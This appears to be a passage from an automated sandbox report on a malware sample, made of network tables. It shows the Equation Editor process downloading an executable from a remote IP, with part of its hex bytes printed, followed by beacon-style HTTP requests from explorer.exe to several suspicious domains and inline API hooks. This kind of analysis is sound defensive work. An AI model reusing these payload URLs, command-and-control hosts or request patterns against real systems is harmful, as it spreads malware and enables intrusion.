                                                                                                                                                                                  Oct 30, 2024 08:37:30.588325977 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588340998 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588341951 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588360071 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588377953 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588377953 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588392973 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588407993 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588407993 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588408947 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588424921 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588426113 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588442087 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588450909 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588459015 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588469982 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588474989 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588490963 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588511944 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588562965 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589565039 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589581966 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589607954 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589624882 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589624882 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589642048 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589659929 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589667082 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589667082 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589667082 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589690924 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589706898 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589710951 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589726925 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589744091 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589754105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589761019 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589771986 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589780092 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589791059 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589803934 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589806080 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589822054 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589828014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589838982 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589844942 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589862108 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589876890 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589914083 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.790705919 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:38:51.204629898 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.210174084 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:51.210251093 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.210309982 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.216156006 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:51.849329948 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:51.849509954 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.849716902 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:51.849816084 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.854948044 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:33.913908005 CET4916580192.168.2.2268.66.226.117
                                                                                                                                                                                  Oct 30, 2024 08:40:33.925524950 CET804916568.66.226.117192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:33.925584078 CET4916580192.168.2.2268.66.226.117
                                                                                                                                                                                  Oct 30, 2024 08:40:33.925651073 CET4916580192.168.2.2268.66.226.117
                                                                                                                                                                                  Oct 30, 2024 08:40:33.931358099 CET804916568.66.226.117192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:34.559539080 CET804916568.66.226.117192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:34.560085058 CET4916580192.168.2.2268.66.226.117
                                                                                                                                                                                  Oct 30, 2024 08:40:34.566612959 CET804916568.66.226.117192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:34.568079948 CET4916580192.168.2.2268.66.226.117

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Oct 30, 2024 08:38:11.549665928 CET5456253192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:38:11.560230017 CET53545628.8.8.8192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:31.831712961 CET5291753192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:38:31.842817068 CET53529178.8.8.8192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:51.190649033 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:38:51.202903986 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:39:11.313864946 CET5789353192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:39:11.327434063 CET53578938.8.8.8192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:39:52.711354017 CET5482153192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:39:52.721528053 CET53548218.8.8.8192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:12.888900042 CET5471953192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:40:13.004703999 CET53547198.8.8.8192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:33.900860071 CET4988153192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:40:33.913568974 CET53498818.8.8.8192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:53.956487894 CET5499853192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:40:53.969841957 CET53549988.8.8.8192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:41:16.195372105 CET5278153192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:41:16.237962008 CET53527818.8.8.8192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:41:36.174273968 CET6392653192.168.2.228.8.8.8
                                                                                                                                                                                  Oct 30, 2024 08:41:36.245017052 CET53639268.8.8.8192.168.2.22

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Oct 30, 2024 08:38:11.549665928 CET192.168.2.228.8.8.80x622aStandard query (0)www.education2jobs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:38:31.831712961 CET192.168.2.228.8.8.80xa59fStandard query (0)www.lifeofthobes.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:38:51.190649033 CET192.168.2.228.8.8.80x575cStandard query (0)www.thecareskin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:39:11.313864946 CET192.168.2.228.8.8.80xebecStandard query (0)www.opmk.monsterA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:39:52.711354017 CET192.168.2.228.8.8.80x15a2Standard query (0)www.affirmationtotebags.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:40:12.888900042 CET192.168.2.228.8.8.80xc2c0Standard query (0)www.mbbwa4wp.cfdA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:40:33.900860071 CET192.168.2.228.8.8.80xb8eStandard query (0)www.fcno30.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:40:53.956487894 CET192.168.2.228.8.8.80xe8fbStandard query (0)www.ko-or-a-news.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:41:16.195372105 CET192.168.2.228.8.8.80xbbcbStandard query (0)www.launchyouglobal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:41:36.174273968 CET192.168.2.228.8.8.80xf219Standard query (0)www.trygenesisx.comA (IP address)IN (0x0001)false

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Oct 30, 2024 08:38:11.560230017 CET8.8.8.8192.168.2.220x622aName error (3)www.education2jobs.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:38:31.842817068 CET8.8.8.8192.168.2.220xa59fName error (3)www.lifeofthobes.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:38:51.202903986 CET8.8.8.8192.168.2.220x575cNo error (0)www.thecareskin.comthecareskin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:38:51.202903986 CET8.8.8.8192.168.2.220x575cNo error (0)thecareskin.com13.248.213.45A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:38:51.202903986 CET8.8.8.8192.168.2.220x575cNo error (0)thecareskin.com76.223.67.189A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:39:11.327434063 CET8.8.8.8192.168.2.220xebecName error (3)www.opmk.monsternonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:39:52.721528053 CET8.8.8.8192.168.2.220x15a2Name error (3)www.affirmationtotebags.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:40:13.004703999 CET8.8.8.8192.168.2.220xc2c0Name error (3)www.mbbwa4wp.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:40:33.913568974 CET8.8.8.8192.168.2.220xb8eNo error (0)www.fcno30.comfcno30.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:40:33.913568974 CET8.8.8.8192.168.2.220xb8eNo error (0)fcno30.com68.66.226.117A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:40:53.969841957 CET8.8.8.8192.168.2.220xe8fbName error (3)www.ko-or-a-news.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:41:16.237962008 CET8.8.8.8192.168.2.220xbbcbServer failure (2)www.launchyouglobal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 30, 2024 08:41:36.245017052 CET8.8.8.8192.168.2.220xf219Server failure (2)www.trygenesisx.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  • www.thecareskin.com
                                                                                                                                                                                  • www.fcno30.com

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.224916387.120.84.38803568C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 30, 2024 08:37:28.755836010 CET322OUTGET /txt/4q0pGnqqpgTTSL7.exe HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: 87.120.84.38
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702449083 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                  Server: nginx/1.26.2
                                                                                                                                                                                  Date: Wed, 30 Oct 2024 07:37:29 GMT
                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                  Content-Length: 662016
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Last-Modified: Wed, 30 Oct 2024 02:32:29 GMT
                                                                                                                                                                                  ETag: "a1a00-625a88369ea83"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 64 9a 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 09 00 00 1a 00 00 00 00 00 00 e2 1d 0a 00 00 20 00 00 00 20 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 1d 0a 00 4f 00 00 00 00 20 0a 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELd!g0 @ `@O @ H.text `.rsrc @@.reloc@@BHqgD0((+*0((+*0((+*0((+*0((+*0((+*0((+*0((+*0((+*0(( +*0
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702516079 CET1236INData Raw: 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 21 00 00 0a 0a 2b 00 06 2a 00 13 30 07 00 21 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 0e 06 28 22 00 00 0a 0a 2b 00 06
                                                                                                                                                                                  Data Ascii: ((!+*0!(("+*vs~#*0J~~#($,rps%z~,~~#(&(*0},~(+a
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702528954 CET1236INData Raw: 00 0a 6f 4b 00 00 0a 00 02 7b 06 00 00 04 28 01 00 00 2b 02 fe 06 2e 00 00 06 73 4d 00 00 0a 6f 4e 00 00 0a 00 02 7b 14 00 00 04 03 6f 39 00 00 0a 00 02 7b 11 00 00 04 17 6f 48 00 00 0a 00 2a 00 00 13 30 03 00 48 00 00 00 08 00 00 11 00 02 7b 15
                                                                                                                                                                                  Data Ascii: oK{(+.sMoN{o9{oH*0H{oOoP,-{oOoQoRoSoT}+*0P{oJoU{oJ(+~p%-&~osW%p(+(+oZ
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702539921 CET1236INData Raw: 00 00 0a 72 b5 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 28 62 00 00 0a 13 08 11 08 39 9c 00 00 00 00 11 06 6f 6c 00 00 0a 72 b5 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 13 09 11 06 6f 6c 00 00 0a 72 bf 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 13 0a 72
                                                                                                                                                                                  Data Ascii: rpomon(b9olrpomonolrpomonrpso`%rQp%%rWp%%r]p(eolrpomopoqor%/os:u4,ot+*
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702550888 CET848INData Raw: 00 02 7b 0d 00 00 04 1e 1e 1e 1e 73 83 00 00 0a 6f 84 00 00 0a 00 02 7b 0d 00 00 04 72 e9 02 00 70 6f 85 00 00 0a 00 02 7b 0d 00 00 04 1f 6d 1f 24 73 86 00 00 0a 6f 87 00 00 0a 00 02 7b 0d 00 00 04 1b 6f 88 00 00 0a 00 02 7b 0d 00 00 04 72 fd 02
                                                                                                                                                                                  Data Ascii: {so{rpo{m$so{o{rpo9{o{o{+so{ Os/o{so{rpo{ "so{o
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702560902 CET1236INData Raw: 39 00 00 0a 00 02 7b 14 00 00 04 17 6f 8c 00 00 0a 00 02 7b 14 00 00 04 20 75 02 00 00 20 81 00 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 14 00 00 04 1e 16 1e 16 73 83 00 00 0a 6f 84 00 00 0a 00 02 7b 14 00 00 04 72 bd 03 00 70 6f 85 00 00 0a
                                                                                                                                                                                  Data Ascii: 9{o{ u s/o{so{rpo{ so{o{rpo9{o{o{o{o{M s/o{so{r
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702583075 CET1236INData Raw: 6f 39 00 00 0a 00 02 7b 1d 00 00 04 17 6f 8c 00 00 0a 00 02 7b 1d 00 00 04 28 a0 00 00 0a 6f a1 00 00 0a 00 02 7b 1d 00 00 04 20 75 02 00 00 20 4f 03 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 1d 00 00 04 1e 16 1e 16 73 83 00 00 0a 6f 84 00 00
                                                                                                                                                                                  Data Ascii: o9{o{(o{ u Os/o{so{r}po{ _ so{o{rpo9"A"As(( s(({o({o
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702594995 CET1236INData Raw: d0 06 00 00 01 28 27 00 00 0a 16 6f bc 00 00 0a 0a 06 8e 16 fe 01 0b 07 2c 09 00 72 61 00 00 70 0c 2b 10 06 16 9a 74 06 00 00 01 6f c2 00 00 0a 0c 2b 00 08 2a 00 13 30 03 00 3b 00 00 00 14 00 00 11 00 28 bb 00 00 0a d0 09 00 00 01 28 27 00 00 0a
                                                                                                                                                                                  Data Ascii: ('o,rap+to+*0;(('o,rap+to+*0;(('o,rap+to+*0;(('o,
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702605009 CET636INData Raw: 00 04 72 99 05 00 70 6f 39 00 00 0a 00 02 7b 21 00 00 04 1f 10 6f d9 00 00 0a 00 02 7b 22 00 00 04 1b 6f cf 00 00 0a 00 02 7b 22 00 00 04 20 23 01 00 00 20 e7 00 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 22 00 00 04 1f 10 16 1e 16 73 83 00 00
                                                                                                                                                                                  Data Ascii: rpo9{!o{"o{" # s/o{"so{")so{"rpo{" )so{"o{"rpo9{"o{#o{# # ;s/o{#
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702617884 CET1236INData Raw: 00 00 01 28 aa 00 00 0a 00 02 1e 1d 1e 1d 73 83 00 00 0a 28 ab 00 00 0a 00 02 16 28 df 00 00 0a 00 02 16 28 e0 00 00 0a 00 02 72 41 06 00 70 28 85 00 00 0a 00 02 1f 18 1f 15 1f 18 1f 15 73 83 00 00 0a 28 e1 00 00 0a 00 02 16 28 e2 00 00 0a 00 02
                                                                                                                                                                                  Data Ascii: (s(((rAp(s((((rApo9{o{o{ o(*(rMpoo}%(4*0Gs{%ssos
                                                                                                                                                                                  Oct 30, 2024 08:37:29.708095074 CET1236INData Raw: 0e 07 7d 3a 00 00 04 02 0e 08 7d 3b 00 00 04 2a 26 00 02 03 7d 34 00 00 04 2a 26 00 02 03 7d 35 00 00 04 2a 26 00 02 03 7d 36 00 00 04 2a 26 00 02 03 7d 37 00 00 04 2a 26 00 02 03 7d 38 00 00 04 2a 26 00 02 03 7d 39 00 00 04 2a 26 00 02 03 7d 3a
                                                                                                                                                                                  Data Ascii: }:};*&}4*&}5*&}6*&}7*&}8*&}9*&}:*&};*0{4+*0{5+*0{6+*0{7+*0{8+*0{9+*


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.224916413.248.213.45801244C:\Windows\explorer.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 30, 2024 08:38:51.210309982 CET168OUTGET /btrd/?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ== HTTP/1.1
                                                                                                                                                                                  Host: www.thecareskin.com
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Oct 30, 2024 08:38:51.849329948 CET346INHTTP/1.1 200 OK
                                                                                                                                                                                  Server: openresty
                                                                                                                                                                                  Date: Wed, 30 Oct 2024 07:38:51 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 206
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 6e 70 78 50 4c 3d 4d 50 4f 38 4f 74 26 4e 50 59 38 3d 41 62 65 49 67 47 6e 7a 42 55 38 33 48 53 58 72 51 6b 70 76 4e 2b 51 61 58 4d 48 61 2f 53 6d 77 33 46 51 76 49 47 59 79 76 4d 4a 72 57 77 59 7a 4d 69 73 35 48 44 36 44 64 74 68 67 67 74 55 6d 54 46 37 6d 46 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ=="}</script></head></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.224916568.66.226.117801244C:\Windows\explorer.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 30, 2024 08:40:33.925651073 CET163OUTGET /btrd/?NPY8=Aqp/nEdW5fSRgBppOcSBDZbXY4IaYVD9lzqE2utQjmbccywWz39dK6w1iF5Po1lTCoAGbA==&dnpxPL=MPO8Ot HTTP/1.1
                                                                                                                                                                                  Host: www.fcno30.com
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Oct 30, 2024 08:40:34.559539080 CET1159INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                  content-type: text/html
                                                                                                                                                                                  content-length: 796
                                                                                                                                                                                  date: Wed, 30 Oct 2024 07:40:34 GMT
                                                                                                                                                                                  server: LiteSpeed
                                                                                                                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                  User Modules

                                                                                                                                                                                  Hook Summary

                                                                                                                                                                                  Function NameHook TypeActive in Processes
                                                                                                                                                                                  PeekMessageAINLINEexplorer.exe
                                                                                                                                                                                  PeekMessageWINLINEexplorer.exe
                                                                                                                                                                                  GetMessageWINLINEexplorer.exe
                                                                                                                                                                                  GetMessageAINLINEexplorer.exe

                                                                                                                                                                                  Processes

                                                                                                                                                                                  Process: explorer.exe, Module: USER32.dll
                                                                                                                                                                                  Function NameHook TypeNew Data
                                                                                                                                                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE6
                                                                                                                                                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                                                                                                                                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                                                                                                                                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE6

                                                                                                                                                                                  Statistics
